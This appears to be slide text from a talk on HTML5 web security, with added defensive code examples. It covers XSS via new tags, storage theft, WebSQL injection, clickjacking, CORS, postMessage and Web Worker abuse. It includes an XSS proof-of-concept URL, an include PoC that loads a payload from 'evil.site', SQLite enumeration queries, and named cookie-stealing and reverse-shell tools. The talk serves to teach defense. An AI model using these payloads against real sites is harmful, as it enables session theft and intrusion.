Talk about html5 security
youstar@insight-labs
Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
History
HTML 1.0: 1993.6, not a standard
HTML 2.0: 1995.11, RFC 1866
HTML 3.2: 1996.1.14, W3C Recommended Standard
HTML 4.0: 1997.12.18, W3C Recommended Standard
HTML 4.01: 1999.12.24, W3C Recommended Standard
XHTML: 2000.1.20, W3C Recommended Standard
HTML5: 2008 first draft standard; 2012 W3C Candidate Recommendation
Features
The three aspects of HTML5:
Content: HTML (new tags and attributes)
Presentation of content: CSS
Interaction with content: JavaScript (new APIs added: Drag and Drop, LocalStorage, Web Workers, etc.)
Features
XSS abuse with tags and attributes
Hiding URL code
Stealing from the storage
Injecting and exploiting WebSQL
ClickJacking && CookieJacking
Cross-origin requests and postMessage
Client-side file includes
Botnet and widgets
In (new in HTML5):
New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
New attributes for tags: autocomplete, autofocus, pattern (yes, a regex) for input
New media events
New <canvas> tag for 2D rendering
New form controls for date and time
Geolocation
New selectors
Client-side storage, including localStorage, sessionStorage, and WebSQL
Out (dropped from HTML5):
Presentation elements such as <font>, <center>
Presentation attributes including align, border
<frame>, <frameset>
<applet>
Old special effects: <marquee>, <bgsound>
<noscript>
Attack:
New XSS Vector
Bypass Black-list Filter
Defense:
Add new tags to Black-list
Change Regex
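The two defenses listed above keep a blacklist current; the example below shows why that race is hard to win and what the alternative looks like. It is an added example, not code from the talk: a blacklist filter of the kind the slide describes (a fixed set of tags to strip) beside an allowlist sanitizer that escapes everything and then restores only a few attribute-free formatting tags, so a tag or event attribute the filter has never heard of stays inert. The tag lists, the escape routine and the two sample inputs are all constructed for this example.

```javascript
// Added example, not from the talk: tag blacklist vs. escape-then-allowlist.

// Blacklist filter as on the slide: strip a fixed set of "dangerous" tags and
// pass everything else through. Every tag not on this list is trusted.
const BLACKLISTED_TAGS = ["script", "iframe", "object", "embed", "applet"];

function blacklistFilter(html) {
  let out = html;
  for (const tag of BLACKLISTED_TAGS) {
    // removes opening, closing and self-closing forms of <tag ...>
    out = out.replace(new RegExp(`<\\/?${tag}\\b[^>]*>`, "gi"), "");
  }
  return out;
}

// Allowlist approach: escape the whole string first, then re-enable only
// exact, attribute-less forms of a few formatting tags. Any other tag, and
// every attribute (including on* handlers), remains escaped text.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "p", "br"];

function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function allowlistSanitize(html) {
  let out = escapeHtml(html);
  for (const tag of ALLOWED_TAGS) {
    // only "&lt;b&gt;" / "&lt;/b&gt;" are restored; "&lt;b onclick=..." is not
    out = out.replace(new RegExp(`&lt;(\\/?)${tag}&gt;`, "gi"), "<$1" + tag + ">");
  }
  return out;
}

// Constructed inputs: a classic vector the blacklist knows about, and an
// HTML5-only one built from a new tag plus an event-handler attribute.
const SAMPLES = {
  classic: "<script>x()</script><b>hello</b>",
  html5: '<video src="x" onerror="x()"></video><b>hello</b>',
};

// Run both filters over one sample so the outputs can be compared side by side.
function compareFilters(sample) {
  return {
    blacklist: blacklistFilter(sample),
    allowlist: allowlistSanitize(sample),
  };
}

console.log(compareFilters(SAMPLES.html5));
```

The blacklist strips the classic sample correctly but passes the <video> sample untouched; the allowlist output keeps the <b>hello</b> formatting and renders the <video> element as harmless text. For real applications, use a parser-based sanitizer rather than regular expressions; the point here is the allowlist design, not the regex.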
DOM history API: window.history.back(); window.history.forward(); window.history.go();
HTML5 adds history.pushState(stateObject, title, URL);
history.replaceState(): the same as pushState, but modifies the current history entry instead of adding a new one.
PoC: the injected script calls pushState to drop the query string from the address bar, so the payload is no longer visible in the URL:
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState(,'',location.href.split("?").shift());document.write(1)</script>
After the call the address bar shows only:
http://127.0.0.1/html5/poc/history/xsspoc.php
Type
LocalStorage: for long-term storage
SessionStorage: for the session (lasts until the browser is closed)
Differences
Cookies: 4k
LocalStorage / SessionStorage: depends on the browser (usually 5MB)
Support
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
Function
(localStorage | sessionStorage).setItem(key, value)
(localStorage | sessionStorage).getItem(key)
(localStorage | sessionStorage).removeItem(key)
(localStorage | sessionStorage).clear()
Attack
Get the data from the storage (cookie, passwd, etc.)
Store your XSS payload in the storage
No path restriction: storage is scoped to the origin only, unlike cookies, which can be limited to a path
Defense
Don't store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HttpOnly and Secure flags
Database Storage
The same as Google Gears
Operate
var db = openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");
db.transaction(function (tx) { tx.executeSql("YOUR SQL STATEMENT HERE"); });
Type
SQLite (supported by WebKit)
Attack
Store shellcode
SQL injection
Defense
Be strict with SQL operations (build statements with bound parameters, not string concatenation)
Encode the SQL result before displaying it
Don't store sensitive data
Store shellcode
SQL Injection
Use sqlite_master to enumerate the schema:
SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()
Select with ?
executeSql("SELECT name FROM stud WHERE id=" + input_id); // False: input_id is concatenated into the statement
executeSql("SELECT name FROM stud WHERE id=?", [input_id]); // True: input_id is passed as a bound parameter
Drag and drop basics
Drag data, the drag feedback image, drag effects
Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend
ClickJacking
XSS + Drag
CookieJacking
Combines several techniques to steal the user's local cookies
Technology
How to read the local file: iframe + file://
How to detect the state of cookies: Clickjacking
How to send the cookies: SMB
Defense
Use iframe with sandbox
if (top !== window) top.location = window.location.href;
if (top != self) top.location.href = self.location.href;
postMessage
Send
otherWindow.postMessage(message, targetOrigin);
Receive
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event) {
  if (event.origin !== "http://example.org:8080")
    return;
  // ...
}
Defense
Check the postMessage origin
Don't use innerHTML
Element.innerHTML = e.data;   // danger
Element.textContent = e.data; // safe
Don't use eval to deal with the message
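The receiver above checks one origin and then does "..."; the example below, added here and not part of the talk, fills in that handler so the three defenses (exact origin check, textContent instead of innerHTML, no eval) are in one testable function. The event shape { origin, data } is the browser's; the sink object standing in for a DOM element, the second allowed origin and the sample messages are constructed so the logic runs under Node.

```javascript
// Added example, not from the talk: a postMessage receiver with the slide's
// defenses, written so the accept/reject decision can be tested outside a browser.

const TRUSTED_MESSAGE_ORIGINS = new Set([
  "http://example.org:8080",   // the origin checked on the slide
  "https://app.example",       // constructed second trusted origin
]);

// Exact-string membership only. startsWith / indexOf / regex checks are the
// usual way origin validation goes wrong, so none of them appear here.
function isTrustedOrigin(origin) {
  return TRUSTED_MESSAGE_ORIGINS.has(origin);
}

// Handle one message: reject untrusted origins and unexpected payload types,
// otherwise write the data into the sink as text (never parsed as markup).
// Returns the decision so callers and tests can inspect it.
function handleMessage(event, sink) {
  if (!isTrustedOrigin(event.origin)) {
    return { accepted: false, reason: "untrusted origin " + event.origin };
  }
  if (typeof event.data !== "string") {
    return { accepted: false, reason: "unexpected data type" };
  }
  sink.textContent = event.data;   // safe: textContent does not interpret HTML
  return { accepted: true, reason: null };
}

// Browser wiring in the slide's addEventListener form; guarded so the file
// also loads under Node, where there is no window.
if (typeof window !== "undefined") {
  window.addEventListener("message", function (event) {
    handleMessage(event, document.getElementById("main"));
  }, false);
}

// Constructed messages: one legitimate, two lookalike origins that a prefix
// or substring check would wrongly accept, one trusted origin with a non-string body.
const SAMPLE_EVENTS = [
  { origin: "http://example.org:8080", data: "<b>hi</b>" },
  { origin: "http://example.org.attacker.test:8080", data: "<b>hi</b>" },
  { origin: "http://example.org", data: "<b>hi</b>" },
  { origin: "https://app.example", data: { nested: true } },
];

// Run every sample through a fresh sink and report what was rendered.
function runSamples() {
  return SAMPLE_EVENTS.map(function (ev) {
    const sink = { textContent: "" };
    const result = handleMessage(ev, sink);
    return { origin: ev.origin, accepted: result.accepted, rendered: sink.textContent };
  });
}

console.log(runSamples());
```

Only the first sample is accepted, and even then the "<b>hi</b>" string lands in textContent, so it is displayed literally rather than parsed. The port mismatch in the third sample is a real origin mismatch: origin is scheme + host + port, and all three must match.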
Cross-Origin Resource Sharing
Originally Ajax calls were subject to the Same Origin Policy:
Site A cannot make XMLHttpRequests to Site B
HTML5 makes it possible to make these cross-domain calls
Site A -> Site B (the response must include a header)
Access-Control-Allow-Origin: Site A (must)
Access-Control-Allow-Credentials: true | false
Access-Control-Expose-Headers: ...
etc.
Defense
Don't set this: Access-Control-Allow-Origin: *
(the same mistake as a permissive Flash crossdomain.xml)
Prevent DDOS
if (origin == "Site A") header("Access-Control-Allow-Origin: Site A"); ... // process request
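The one-line check above is the right idea; the example below, added here and not from the talk, turns it into a complete header-building function: reflect the request's Origin only when it is on an allowlist, send Access-Control-Allow-Credentials only for that case, never emit "*", and add Vary: Origin so caches do not serve one origin's response to another. The allowlisted hostname stands in for "Site A" and is constructed; the function is framework-independent so it can be tested without a server.

```javascript
// Added example, not from the talk: CORS response headers from an origin allowlist.

const CORS_ALLOWED_ORIGINS = new Set([
  "https://site-a.example",   // "Site A" from the slide; constructed hostname
]);

// Build the CORS headers for one response.
//   requestOrigin   - value of the request's Origin header, or undefined when
//                     the browser sent none (same-origin or non-CORS request)
//   withCredentials - whether this endpoint is meant to work with cookies
// Returns a plain object of header name -> value.
function corsHeaders(requestOrigin, withCredentials) {
  // The response varies by Origin, so shared caches must key on it.
  const headers = { "Vary": "Origin" };

  // No Origin, or one we do not know (including the literal string "null"
  // that sandboxed iframes and file:// pages send): emit no Access-Control-*
  // headers at all and the browser refuses to expose the response.
  if (requestOrigin === undefined || !CORS_ALLOWED_ORIGINS.has(requestOrigin)) {
    return headers;
  }

  // Exact allowlisted value reflected back; never "*".
  headers["Access-Control-Allow-Origin"] = requestOrigin;
  if (withCredentials) {
    // Only meaningful with a specific origin; browsers reject "*" here anyway.
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// The weak configuration the slide warns against, kept only for contrast.
// Every origin on the Internet can read responses carrying this header.
function permissiveCorsHeaders() {
  return { "Access-Control-Allow-Origin": "*" };
}

// Apply the decision to a response-like object that has setHeader(name, value),
// e.g. Node's http.ServerResponse or an Express res.
function applyCors(requestHeaders, res, withCredentials) {
  const headers = corsHeaders(requestHeaders["origin"], withCredentials);
  for (const name of Object.keys(headers)) {
    res.setHeader(name, headers[name]);
  }
  return headers;
}

console.log(corsHeaders("https://site-a.example", true));
```

Because the allowlist check is an exact Set lookup, "https://site-a.example.attacker.test" and "http://site-a.example" (wrong scheme) both fall through to the no-headers branch, which is the safe default.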
Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET", location.hash.substring(1));
x.onreadystatechange = function () {
  if (x.readyState == 4)
    document.getElementById("main").innerHTML = x.responseText;
};
x.send();
</script>
<div id="main"></div>
</body></html>
POC
Introducing cross-origin requests: http://example.com/#http://evil.site/payload.php
Contents of 'payload.php' will be included as HTML within <div id="main"></div>
New type of XSS!!
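The page above takes a URL straight from location.hash and writes the response into the DOM with innerHTML, which is the whole vulnerability. The example below, added here and not from the talk, is the fixed version of that include: it resolves the hash against the page's own origin with the WHATWG URL class, accepts only same-origin paths under one fixed directory, and inserts the response as text. The page origin is the one from the PoC; the /fragments/ directory and the sink object are constructed.

```javascript
// Added example, not from the talk: safe resolution of a hash-supplied include URL.

const PAGE_ORIGIN = "http://example.com";   // origin of the including page, as in the PoC
const INCLUDE_PREFIX = "/fragments/";       // constructed: the only directory we will load from

// Turn the raw location.hash into a URL we are willing to fetch, or null.
// Every rejection is a return of null; the caller then loads nothing.
function resolveIncludeTarget(hash, pageOrigin) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (raw === "") return null;

  let url;
  try {
    // Relative paths resolve against our own origin; absolute URLs keep theirs.
    url = new URL(raw, pageOrigin + "/");
  } catch (e) {
    return null;   // unparseable input
  }

  // Cross-origin URLs (http://evil.site/..., //evil.site/...) have a different
  // origin; javascript: and data: URLs have the opaque origin "null". All rejected.
  if (url.origin !== pageOrigin) return null;

  // URL parsing has already collapsed "..", so a prefix check on the
  // normalized pathname is enough to confine loads to the fragment directory.
  if (!url.pathname.startsWith(INCLUDE_PREFIX)) return null;

  return url.href;
}

// Write the fetched body into the sink as text, never as markup. If markup
// were required here, it would have to go through a sanitizer first.
function renderInclude(sink, body) {
  sink.textContent = body;
  return sink;
}

// Browser wiring, guarded so the file also loads under Node for testing.
if (typeof window !== "undefined") {
  const target = resolveIncludeTarget(location.hash, location.origin);
  if (target !== null) {
    fetch(target)
      .then(function (r) { return r.text(); })
      .then(function (body) { renderInclude(document.getElementById("main"), body); });
  }
}

console.log(resolveIncludeTarget("#http://evil.site/payload.php", PAGE_ORIGIN));   // null
console.log(resolveIncludeTarget("#/fragments/about.html", PAGE_ORIGIN));          // allowed
```

The PoC URL from the slide is rejected on the origin comparison, and so are protocol-relative and javascript: forms; a plain relative path under /fragments/ resolves to a same-origin URL and is the only thing the page will fetch.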
Web Workers
Run scripts in the background, independently of the page
Very simple:
var w = new Worker("some_script.js");
w.onmessage = function (e) { /* do something */ };
w.terminate();
Can access: XHR, the navigator object, the application cache; can spawn other workers!
Can't access: DOM, window, document objects
Attack
Botnet
Application-level DDoS attacks
Email spam
Distributed password cracking
Network scanning
Guessing the user's private IP address
Identify the user's subnet
Identify the IP address
COR + XSS + Workers = Shell of the Future
Tools
HTML5CSdump: uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a given domain name
JS-Recon: port scans, network scans, detecting the private IP address
Imposter: steal cookies, set cookies, steal Local Shared Objects, steal stored passwords from Firefox, etc.
Shell of the Future: reverse web shell handler; bypasses anti-session-hijacking measures
Ravan: JavaScript-based distributed computing system for hashing algorithms: MD5, SHA1, SHA256, SHA512
Reference
New security threats brought by HTML5 (HTML5 带来的新安全威胁): xisigr
Attacking with HTML5: lavakumark
Abusing HTML5: Ming Chow
HTML5 Web Security: Thomas Röthlisberger
Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
Cookiejacking: Rosario Valotta
http://heideri.ch/jso/#html5
http://www.wooyun.org/bugs/wooyun-2011-02351
http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
http://www.html5test.com
http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
http://code.google.com/intl/zh-CN/apis/gears/api_database.html
http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
http://www.w3.org/TR/access-control/
http://m-austin.com/blog/?p=19
https://developer.mozilla.org/en/
http://www.w3.org/TR/cors/
http://www.andlabs.org/tools/ravan.html
http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/